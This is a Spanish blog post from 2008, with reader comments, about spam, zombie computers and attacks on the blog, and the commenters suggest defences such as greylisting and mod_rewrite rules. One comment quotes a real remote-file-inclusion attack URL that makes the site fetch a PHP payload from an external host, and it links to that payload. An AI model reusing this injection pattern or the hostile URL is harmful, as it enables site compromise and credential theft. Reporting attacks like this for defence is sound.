Suscribirse vía RSS
Suscribirse a nuestro Twitter
Supongo que todos hemos notado desde hace unos meses que el SPAM se ha incrementado. Una de las causas es que los ataques se lanzan desde ordenadores zombie. Los usuarios inexpertos muchas veces caen en las garras de delincuentes sin saberlo. Encima, ahora resulta que con MS Windows Vista la cosa está más fácil para los malos y lograr el control de un ordenador o acceder a una cuenta privada de gmail no es tan difícil.
Además están los webattacks, también realizados desde ordenadores zombie que, en muchas ocasiones, buscan “morder” para conseguir también que el ordenador destino sea uno más de la red zombie. Nuestro blog, como muchos, ha sufrido las últimas semanas múltiples intentos de “mordedura zombie” con scripts PHP al estilo “vamos a ver que hay por ahí dentro“.
Me parece que voy a tener que dedicar un tiempo a consultar temas relacionados con “el lado del mal” para ver si encuentro algún tipo de vacuna contra los ataques zombie, sean web, xss, sql injection, o spam.
Artículos relacionados
|
-
Makj dice:
20 de Agosto de 2008 a las 8:07contra el SPAM hay una estrategia muy ingeniosa que permite eliminar entre el 90% y el 100% del SPAM entrante en un servidor de correo, eso si, el coste de esta solucion es un retardo en la entrega de los mensajes.
la solucion pasa por incluir un filtro de greylisting a la entrada de nuestro servidor, y a continuacion el tipico filtro antispam para los que se puedan “colar” por el primero.
yo era muy esceptico respecto de esta solucion cuando la encontre por ahi, pero la verdad es que funciona increiblemente bien, mucho mejor de lo esperado: el primer filtro elimina alrededor del 90% del posible SPAM, quitando mucho trabajo a nuestro filtro, que si esta bien configurado nos eliminara el resto del SPAM.
seguramente este sistema tambien tiene sus puntos debiles, pero seguro que son mucho mas fuertes que sin todo esto -
Carlos A. García dice:
20 de Agosto de 2008 a las 8:26OK. Lo que nos queda es solucionar el tema de los scripts php. Aparecen como visitas normales a nuestro blog, pero pasando como parámetro un fichero que está locaizado en un ordenador zombi. Este fichero es un php que intenta obtener nuestro nombre de usuario, password, etc.
La url con la que acceden a nosotros es, por ejemplo:
http://www.balearsinnovacio.com/blog/?p=153/apps/apps.php?app=http://warsector.ru/access2006.log
Si tienes uriosidad por ver el php que nos intentan inyectar, sigue el hilo y mira: http://warsector.ru/access2006.log
Ejem … esto es una demostración más de que cualquier legislación sobre internet no es más que un patético intento de ponerle puertas al campo. ¿Alguien sabe como comunicarnos con los rusos para reportarles el incidente?
Saludos -
Makj dice:
20 de Agosto de 2008 a las 13:45un posible workaround para solucionar parcialmente el problema es usar el mod_rewrite de apache, eso te permitiria evitar direcciones en las que haya URLs incrustadas con parametros…
-
Javier Jofre dice:
21 de Agosto de 2008 a las 11:00Efectivamente, otra forma que circula por internet es mediante la modificación del archivo .htaccess.
Un saludo.
-
Javier Jofre dice:
13 de Septiembre de 2008 a las 11:14Por cierto, para el que le vaya a ser útil a causa de que tenga que trabajar o manejar bases de datos MySQL: GreenSQL es un proxy que protege a MySQL de las técnicas de SQL Injection.
Un saludo.
Javier Jofre (12-May-2010)
Gracias a O'Reilly, podemos asistir vía online y de forma gratuita a algunos cursos sobre desarrollo en Java para Android. Próximamente (en unos días) empieza el curso de creación de un cliente twitter. Espero que lo disfrutéis.